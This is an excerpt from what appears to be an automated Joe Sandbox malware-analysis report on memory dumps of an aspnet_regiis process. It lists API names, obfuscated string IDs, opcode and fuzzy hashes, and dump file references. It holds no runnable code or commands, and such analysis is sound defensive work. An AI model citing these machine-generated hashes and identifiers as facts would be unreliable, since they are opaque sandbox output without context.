                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: 8$; ,)$?&x+
                                                                                              • API String ID: 3664257935-698864271
                                                                                              • Opcode ID: bf57d832783c55b0e0bc0c8943cd14c26ff96d0b4ef054224db9509766a1358d
                                                                                              • Instruction ID: 646e4bb0aeb9788e1ab9107cfa78b19e0d75d1ec8de8490f77fda0349e7247cd
                                                                                              • Opcode Fuzzy Hash: bf57d832783c55b0e0bc0c8943cd14c26ff96d0b4ef054224db9509766a1358d
                                                                                              • Instruction Fuzzy Hash: 0B515A715483C08BD33A8B258C617ABBFE2DFD6306F14595DE8D69B3C1DA38450A8B52
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 027B7925
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: :W>Q$RS$V3O=
                                                                                              • API String ID: 237503144-1471300816
                                                                                              • Opcode ID: e712b3a7e22936511270df3cb3d27a207a3c56bf1075138efa48fba79e212513
                                                                                              • Instruction ID: f39bc39a8fb6ce03643e7a70d12024268aa333e8a132bba39fb481714ef09be4
                                                                                              • Opcode Fuzzy Hash: e712b3a7e22936511270df3cb3d27a207a3c56bf1075138efa48fba79e212513
                                                                                              • Instruction Fuzzy Hash: 994166726483548FC324CF55998038FFBE0EBC4714F0A4A2CE9E967351D7B49906CB82
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: 0$?7g)
                                                                                              • API String ID: 3341692771-1620791588
                                                                                              • Opcode ID: e298aace35096c3fa5a8d7ed65db5b78534bf41026a241841080f5ffcf22e9a2
                                                                                              • Instruction ID: 427d86f4c2d9ece29f01b12ce3bd6926854d706234f1c370f3cb29a44568a788
                                                                                              • Opcode Fuzzy Hash: e298aace35096c3fa5a8d7ed65db5b78534bf41026a241841080f5ffcf22e9a2
                                                                                              • Instruction Fuzzy Hash: 5C91B470508FC0CAE326863888987D7BFD11BA6318F08499DC1FE4B3D2C7BA2159C766
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 027B324D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: G%&$G%&
                                                                                              • API String ID: 237503144-3960618973
                                                                                              • Opcode ID: 89204ddcaec50fccc18cc35f13355c1c48c2999a43c185b9f9cde48bbce7905d
                                                                                              • Instruction ID: 2f749a6387ba6162aa3d0523c72d9a3eda3b1557e679f4fb1c3423cfc8640449
                                                                                              • Opcode Fuzzy Hash: 89204ddcaec50fccc18cc35f13355c1c48c2999a43c185b9f9cde48bbce7905d
                                                                                              • Instruction Fuzzy Hash: E421FD74A0C354AFE314CE25E80175FBBE5EBC2B04F14C92DE5D96B281DB7599068B82